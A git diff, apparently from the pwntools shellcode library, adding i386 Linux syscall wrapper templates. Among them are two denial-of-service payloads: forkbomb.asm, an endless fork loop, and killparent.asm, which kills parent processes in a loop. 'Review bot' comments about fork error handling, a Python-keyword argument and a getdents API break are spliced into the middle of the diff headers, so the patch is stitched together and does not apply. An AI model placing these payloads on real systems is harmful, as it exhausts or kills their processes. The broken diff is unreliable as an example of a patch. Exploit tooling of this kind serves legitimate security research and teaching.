a/pwnlib/shellcraft/templates/i386/linux/fchmod.asm b/pwnlib/shellcraft/templates/i386/linux/fchmod.asm new file mode 100644 index 000000000..c1ba15b9b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} 
diff --git a/pwnlib/shellcraft/templates/i386/linux/fchmodat.asm b/pwnlib/shellcraft/templates/i386/linux/fchmodat.asm new file mode 100644 index 000000000..1353a255e --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fchown.asm b/pwnlib/shellcraft/templates/i386/linux/fchown.asm new file mode 100644 index 000000000..0fd1f4635 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fchownat.asm b/pwnlib/shellcraft/templates/i386/linux/fchownat.asm new file mode 100644 index 000000000..5e5dd1662 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/i386/linux/fcntl.asm b/pwnlib/shellcraft/templates/i386/linux/fcntl.asm new file mode 100644 index 000000000..71ec83e64 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/fcntl.asm 
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, cmd, vararg"/>
+<%docstring>
+Invokes the syscall fcntl. See 'man 2 fcntl' for more information.
+
+Arguments:
+ fd(int): fd
+ cmd(int): cmd
+ vararg(int): vararg
+
+
+ ${syscall('SYS_fcntl', fd, cmd, vararg)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/fdatasync.asm b/pwnlib/shellcraft/templates/i386/linux/fdatasync.asm
new file mode 100644
index 000000000..89e7f3e11
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/fdatasync.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fildes"/>
+<%docstring>
+Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information.
+
+Arguments:
+ fildes(int): fildes
+
+
+ ${syscall('SYS_fdatasync', fildes)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/flock.asm b/pwnlib/shellcraft/templates/i386/linux/flock.asm
new file mode 100644
index 000000000..da4d5c942
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/flock.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, operation"/>
+<%docstring>
+Invokes the syscall flock. See 'man 2 flock' for more information.
+
+Arguments:
+ fd(int): fd
+ operation(int): operation
+
+
+ ${syscall('SYS_flock', fd, operation)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/fork.asm b/pwnlib/shellcraft/templates/i386/linux/fork.asm
new file mode 100644
index 000000000..008d9eca2
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/fork.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall fork. See 'man 2 fork' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_fork')}
diff --git a/pwnlib/shellcraft/templates/i386/linux/forkbomb.asm b/pwnlib/shellcraft/templates/i386/linux/forkbomb.asm
new file mode 100644
index 000000000..7aeb1bc4c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/forkbomb.asm
@@ -0,0 +1,13 @@
+<%
+ from pwnlib.shellcraft.i386.linux import fork
+ from pwnlib.shellcraft.common import label
+%>
+<%docstring>
+Performs a forkbomb attack.
+
+<%
+ dosloop = label('fork_bomb')
+%>
+${dosloop}:
+ ${fork()}
+ jmp ${dosloop}
diff --git a/pwnlib/shellcraft/templates/i386/linux/forkexit.asm b/pwnlib/shellcraft/templates/i386/linux/forkexit.asm
new file mode 100644
index 000000000..f7c02117f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/forkexit.asm
@@ -0,0 +1,16 @@
+<%
+ from pwnlib.shellcraft import common
+ from pwnlib.shellcraft.i386.linux import fork, exit
+%>
+<%page args=""/>
+<%docstring>
+Attempts to fork. If the fork is successful, the parent exits.
+
+<%
+dont_exit = common.label('forkexit')
+%>
+ ${fork()}
+ cmp eax, 1
+ jl ${dont_exit}
+ ${exit(0)}
+${dont_exit}:
diff --git a/pwnlib/shellcraft/templates/i386/linux/fstat.asm b/pwnlib/shellcraft/templates/i386/linux/fstat.asm
new file mode 100644
index 000000000..ff0062115
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/fstat.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, buf"/>
+<%docstring>
+Invokes the syscall fstat. See 'man 2 fstat' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(stat): buf
+
+
+ ${syscall('SYS_fstat', fd, buf)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/fstat64.asm b/pwnlib/shellcraft/templates/i386/linux/fstat64.asm
new file mode 100644
index 000000000..f2b721613
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/fstat64.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, buf"/>
+<%docstring>
+Invokes the syscall fstat64. See 'man 2 fstat64' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(stat64): buf
+
+
+ ${syscall('SYS_fstat64', fd, buf)}
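Review bot: In forkexit.asm a failed fork takes the child path: `cmp eax, 1` / `jl ${dont_exit}` falls through both for a zero return (the child) and for a negative return (the kernel's -errno, e.g. -EAGAIN when the process limit is hit), so on failure the original process keeps executing whatever follows instead of exiting. If that best-effort behaviour is intended, the docstring should say so, e.g. `If fork fails, execution continues in the original process as though it were the child.`; otherwise test the sign first with `test eax, eax` / `js <failure label>` and exit there. The template also has no `</%docstring>`-visible argument list, so a one-line note on the eax convention (`pid in the parent, 0 in the child, negative on error`) would help readers of the generated docs.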
diff --git a/pwnlib/shellcraft/templates/i386/linux/fstatat64.asm b/pwnlib/shellcraft/templates/i386/linux/fstatat64.asm
new file mode 100644
index 000000000..f1cab0ebb
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/fstatat64.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, file, buf, flag"/>
+<%docstring>
+Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ buf(stat64): buf
+ flag(int): flag
+
+
+ ${syscall('SYS_fstatat64', fd, file, buf, flag)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/fsync.asm b/pwnlib/shellcraft/templates/i386/linux/fsync.asm
new file mode 100644
index 000000000..c458209ce
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/fsync.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd"/>
+<%docstring>
+Invokes the syscall fsync. See 'man 2 fsync' for more information.
+
+Arguments:
+ fd(int): fd
+
+
+ ${syscall('SYS_fsync', fd)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/ftruncate.asm b/pwnlib/shellcraft/templates/i386/linux/ftruncate.asm
new file mode 100644
index 000000000..9bea9bd9d
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/ftruncate.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, length"/>
+<%docstring>
+Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information.
+
+Arguments:
+ fd(int): fd
+ length(off_t): length
+
+
+ ${syscall('SYS_ftruncate', fd, length)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/i386/linux/ftruncate64.asm
new file mode 100644
index 000000000..848f8f556
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/ftruncate64.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, length"/>
+<%docstring>
+Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information.
+
+Arguments:
+ fd(int): fd
+ length(off64_t): length
+
+
+ ${syscall('SYS_ftruncate64', fd, length)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/futimesat.asm b/pwnlib/shellcraft/templates/i386/linux/futimesat.asm
new file mode 100644
index 000000000..b7ee27027
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/futimesat.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, file, tvp"/>
+<%docstring>
+Invokes the syscall futimesat. See 'man 2 futimesat' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ tvp(timeval): tvp
+
+
+ ${syscall('SYS_futimesat', fd, file, tvp)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getcwd.asm b/pwnlib/shellcraft/templates/i386/linux/getcwd.asm
new file mode 100644
index 000000000..11f41e22f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getcwd.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="buf, size"/>
+<%docstring>
+Invokes the syscall getcwd. See 'man 2 getcwd' for more information.
+
+Arguments:
+ buf(char): buf
+ size(size_t): size
+
+
+ ${syscall('SYS_getcwd', buf, size)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getdents.asm b/pwnlib/shellcraft/templates/i386/linux/getdents.asm
index 2815f989d..c8e18935e 100644
--- a/pwnlib/shellcraft/templates/i386/linux/getdents.asm
+++ b/pwnlib/shellcraft/templates/i386/linux/getdents.asm
@@ -1,23 +1,14 @@
-<% from pwnlib.shellcraft import i386 %>
-<%page args="in_fd = 'ebp', size = 255, allocate_stack = True"/>
-<%docstring> Reads to the stack from a directory.
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, dirp, count"/>
+<%docstring>
+Invokes the syscall getdents. See 'man 2 getdents' for more information.
-Args:
- in_fd (int/str): File descriptor to be read from.
- size (int): Buffer size.
- allocate_stack (bool): allocate 'size' bytes on the stack.
-
-You can optioanlly shave a few bytes not allocating the stack space.
-
-The size read is left in eax.
+Arguments:
+ fd(int): fd
+ dirp(int): dirp
+ count(int): count
- ${i386.mov('ebx', in_fd)}
- xor eax, eax
- mov al, SYS_getdents
- cdq
- ${i386.mov('dl', size)}
-%if allocate_stack:
- sub esp, edx
-%endif
- mov ecx, esp
- int 0x80
+
+ ${syscall('SYS_getdents', fd, dirp, count)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getegid.asm b/pwnlib/shellcraft/templates/i386/linux/getegid.asm
new file mode 100644
index 000000000..a064f2abc
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getegid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getegid. See 'man 2 getegid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getegid')}
diff --git a/pwnlib/shellcraft/templates/i386/linux/geteuid.asm b/pwnlib/shellcraft/templates/i386/linux/geteuid.asm
new file mode 100644
index 000000000..b204c7953
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/geteuid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall geteuid. See 'man 2 geteuid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_geteuid')}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getgid.asm b/pwnlib/shellcraft/templates/i386/linux/getgid.asm
new file mode 100644
index 000000000..bd9ff7f92
--- /dev/null
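Review bot: The getdents rewrite drops the old interface (`in_fd='ebp', size=255, allocate_stack=True`, with the buffer carved from the stack and `ecx = esp`) in favour of the generic `fd, dirp, count` form with no defaults, so any existing caller passing those keywords, or relying on the entries landing at `esp`, breaks silently at render time; either keep the old behaviour under a compatibility name or state the break in the commit message, which currently only says `getdents` was "added". Independently, `dirp(int): dirp` mis-types the one pointer argument — it is the buffer that receives `struct linux_dirent` records and `count` is its size in bytes — so I'd write `dirp(void): buffer receiving linux_dirent entries` and `count(int): size of dirp in bytes`, matching the `void` convention the sibling templates use for pointers (e.g. `optval(void)`).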
+++ b/pwnlib/shellcraft/templates/i386/linux/getgid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getgid. See 'man 2 getgid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getgid')}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getgroups.asm b/pwnlib/shellcraft/templates/i386/linux/getgroups.asm
new file mode 100644
index 000000000..436bbb866
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getgroups.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="size, list"/>
+<%docstring>
+Invokes the syscall getgroups. See 'man 2 getgroups' for more information.
+
+Arguments:
+ size(int): size
+ list(gid_t): list
+
+
+ ${syscall('SYS_getgroups', size, list)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getitimer.asm b/pwnlib/shellcraft/templates/i386/linux/getitimer.asm
new file mode 100644
index 000000000..df30e218c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getitimer.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="which, value"/>
+<%docstring>
+Invokes the syscall getitimer. See 'man 2 getitimer' for more information.
+
+Arguments:
+ which(itimer_which_t): which
+ value(itimerval): value
+
+
+ ${syscall('SYS_getitimer', which, value)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getpeername.asm b/pwnlib/shellcraft/templates/i386/linux/getpeername.asm
new file mode 100644
index 000000000..eeaa92dda
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getpeername.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, addr, len"/>
+<%docstring>
+Invokes the syscall getpeername. See 'man 2 getpeername' for more information.
+
+Arguments:
+ fd(int): fd
+ addr(SOCKADDR_ARG): addr
+ len(socklen_t): len
+
+
+ ${syscall('SYS_getpeername', fd, addr, len)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getpgid.asm b/pwnlib/shellcraft/templates/i386/linux/getpgid.asm
new file mode 100644
index 000000000..d814ad5f3
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getpgid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="pid"/>
+<%docstring>
+Invokes the syscall getpgid. See 'man 2 getpgid' for more information.
+
+Arguments:
+ pid(pid_t): pid
+
+
+ ${syscall('SYS_getpgid', pid)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getpgrp.asm b/pwnlib/shellcraft/templates/i386/linux/getpgrp.asm
new file mode 100644
index 000000000..91eabdde9
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getpgrp.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getpgrp')}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getpid.asm b/pwnlib/shellcraft/templates/i386/linux/getpid.asm
new file mode 100644
index 000000000..5195d77a4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getpid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getpid. See 'man 2 getpid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getpid')}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getpmsg.asm b/pwnlib/shellcraft/templates/i386/linux/getpmsg.asm
new file mode 100644
index 000000000..232f0b623
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getpmsg.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/>
+<%docstring>
+Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information.
+
+Arguments:
+ fildes(int): fildes
+ ctlptr(strbuf): ctlptr
+ dataptr(strbuf): dataptr
+ bandp(int): bandp
+ flagsp(int): flagsp
+
+
+ ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getppid.asm b/pwnlib/shellcraft/templates/i386/linux/getppid.asm
new file mode 100644
index 000000000..b227dddba
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getppid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getppid. See 'man 2 getppid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getppid')}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getpriority.asm b/pwnlib/shellcraft/templates/i386/linux/getpriority.asm
new file mode 100644
index 000000000..c209a8615
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getpriority.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="which, who"/>
+<%docstring>
+Invokes the syscall getpriority. See 'man 2 getpriority' for more information.
+
+Arguments:
+ which(priority_which_t): which
+ who(id_t): who
+
+
+ ${syscall('SYS_getpriority', which, who)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getresgid.asm b/pwnlib/shellcraft/templates/i386/linux/getresgid.asm
new file mode 100644
index 000000000..a30ac1f13
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getresgid.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="rgid, egid, sgid"/>
+<%docstring>
+Invokes the syscall getresgid. See 'man 2 getresgid' for more information.
+
+Arguments:
+ rgid(gid_t): rgid
+ egid(gid_t): egid
+ sgid(gid_t): sgid
+
+
+ ${syscall('SYS_getresgid', rgid, egid, sgid)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getresuid.asm b/pwnlib/shellcraft/templates/i386/linux/getresuid.asm
new file mode 100644
index 000000000..06c0d955a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getresuid.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="ruid, euid, suid"/>
+<%docstring>
+Invokes the syscall getresuid. See 'man 2 getresuid' for more information.
+
+Arguments:
+ ruid(uid_t): ruid
+ euid(uid_t): euid
+ suid(uid_t): suid
+
+
+ ${syscall('SYS_getresuid', ruid, euid, suid)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getrlimit.asm b/pwnlib/shellcraft/templates/i386/linux/getrlimit.asm
new file mode 100644
index 000000000..0074c5983
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getrlimit.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="resource, rlimits"/>
+<%docstring>
+Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information.
+
+Arguments:
+ resource(rlimit_resource_t): resource
+ rlimits(rlimit): rlimits
+
+
+ ${syscall('SYS_getrlimit', resource, rlimits)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getrusage.asm b/pwnlib/shellcraft/templates/i386/linux/getrusage.asm
new file mode 100644
index 000000000..7976b8ef3
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getrusage.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="who, usage"/>
+<%docstring>
+Invokes the syscall getrusage. See 'man 2 getrusage' for more information.
+
+Arguments:
+ who(rusage_who_t): who
+ usage(rusage): usage
+
+
+ ${syscall('SYS_getrusage', who, usage)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getsid.asm b/pwnlib/shellcraft/templates/i386/linux/getsid.asm
new file mode 100644
index 000000000..a8c2580e1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getsid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="pid"/>
+<%docstring>
+Invokes the syscall getsid. See 'man 2 getsid' for more information.
+
+Arguments:
+ pid(pid_t): pid
+
+
+ ${syscall('SYS_getsid', pid)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getsockname.asm b/pwnlib/shellcraft/templates/i386/linux/getsockname.asm
new file mode 100644
index 000000000..3d32a3c83
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getsockname.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, addr, len"/>
+<%docstring>
+Invokes the syscall getsockname. See 'man 2 getsockname' for more information.
+
+Arguments:
+ fd(int): fd
+ addr(SOCKADDR_ARG): addr
+ len(socklen_t): len
+
+
+ ${syscall('SYS_getsockname', fd, addr, len)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getsockopt.asm b/pwnlib/shellcraft/templates/i386/linux/getsockopt.asm
new file mode 100644
index 000000000..1a1822d97
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getsockopt.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, level, optname, optval, optlen"/>
+<%docstring>
+Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information.
+
+Arguments:
+ fd(int): fd
+ level(int): level
+ optname(int): optname
+ optval(void): optval
+ optlen(socklen_t): optlen
+
+
+ ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/i386/linux/gettimeofday.asm
new file mode 100644
index 000000000..5125708d0
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/gettimeofday.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="tv, tz"/>
+<%docstring>
+Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information.
+
+Arguments:
+ tv(timeval): tv
+ tz(timezone_ptr_t): tz
+
+
+ ${syscall('SYS_gettimeofday', tv, tz)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/getuid.asm b/pwnlib/shellcraft/templates/i386/linux/getuid.asm
new file mode 100644
index 000000000..b87a941c4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/getuid.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall getuid. See 'man 2 getuid' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_getuid')}
diff --git a/pwnlib/shellcraft/templates/i386/linux/gtty.asm b/pwnlib/shellcraft/templates/i386/linux/gtty.asm
new file mode 100644
index 000000000..6c1784eb6
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/gtty.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, params"/>
+<%docstring>
+Invokes the syscall gtty. See 'man 2 gtty' for more information.
+
+Arguments:
+ fd(int): fd
+ params(sgttyb): params
+
+
+ ${syscall('SYS_gtty', fd, params)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/ioctl.asm b/pwnlib/shellcraft/templates/i386/linux/ioctl.asm
new file mode 100644
index 000000000..c82d5633a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/ioctl.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="fd, request, vararg"/>
+<%docstring>
+Invokes the syscall ioctl. See 'man 2 ioctl' for more information.
+
+Arguments:
+ fd(int): fd
+ request(unsigned): request
+ vararg(int): vararg
+
+
+ ${syscall('SYS_ioctl', fd, request, vararg)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/ioperm.asm b/pwnlib/shellcraft/templates/i386/linux/ioperm.asm
new file mode 100644
index 000000000..aa4d777fc
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/ioperm.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="from, num, turn_on"/>
+<%docstring>
+Invokes the syscall ioperm. See 'man 2 ioperm' for more information.
+
+Arguments:
+ from(unsigned): from
+ num(unsigned): num
+ turn_on(int): turn_on
+
+
+ ${syscall('SYS_ioperm', from, num, turn_on)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/iopl.asm b/pwnlib/shellcraft/templates/i386/linux/iopl.asm
new file mode 100644
index 000000000..0669b5a12
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/iopl.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="level"/>
+<%docstring>
+Invokes the syscall iopl. See 'man 2 iopl' for more information.
+
+Arguments:
+ level(int): level
+
+
+ ${syscall('SYS_iopl', level)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/kill.asm b/pwnlib/shellcraft/templates/i386/linux/kill.asm
new file mode 100644
index 000000000..464c26a16
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/kill.asm
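Review bot: In ioperm.asm, `from` is a Python keyword, and Mako turns `<%page args="from, num, turn_on"/>` into the parameter list of the generated render function, so this template should fail with a SyntaxError the first time `shellcraft.ioperm` is rendered; the generator evidently copied the C parameter name verbatim, and `link.asm` and `linkat.asm` in this commit have the same problem. Rename it, e.g. `<%page args="from_, num, turn_on"/>` and `${syscall('SYS_ioperm', from_, num, turn_on)}`, and update the `Arguments:` entry to `from_(unsigned): from` so callers see the spelling they must use as a keyword. A test that renders every generated template once with dummy arguments would catch this class of error for all architectures.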
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="pid, sig"/>
+<%docstring>
+Invokes the syscall kill. See 'man 2 kill' for more information.
+
+Arguments:
+ pid(pid_t): pid
+ sig(int): sig
+
+
+ ${syscall('SYS_kill', pid, sig)}
diff --git a/pwnlib/shellcraft/templates/i386/linux/killparent.asm b/pwnlib/shellcraft/templates/i386/linux/killparent.asm
new file mode 100644
index 000000000..71faf16e1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/killparent.asm
@@ -0,0 +1,17 @@
+<%
+ from pwnlib.shellcraft.i386.linux import getppid, kill
+ from pwnlib.constants import SIGKILL
+ from pwnlib.shellcraft.common import label
+%>
+<%docstring>
+Kills its parent process until whatever the parent is (probably init)
+cannot be killed any longer.
+
+<%
+ killparent_loop = label('killparent')
+%>
+${killparent_loop}:
+ ${getppid()}
+ ${kill('eax', SIGKILL)}
+ test eax, eax
+ jz ${killparent_loop}
diff --git a/pwnlib/shellcraft/templates/i386/linux/lchown.asm b/pwnlib/shell
craft/templates/i386/linux/lchown.asm
new file mode 100644
index 000000000..4a8c6c83b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/i386/linux/lchown.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.i386.linux import syscall
+%>
+<%page args="file, owner, group"/>
+<%docstring>
+Invokes the syscall lchown. See 'man 2 lchown' for more information.
+
+Arguments:
+ file(char): file
+ owner(uid_t): owner
+ group(gid_t): group
+
+
+ ${syscall('SYS_lchown', file, owner, group)}
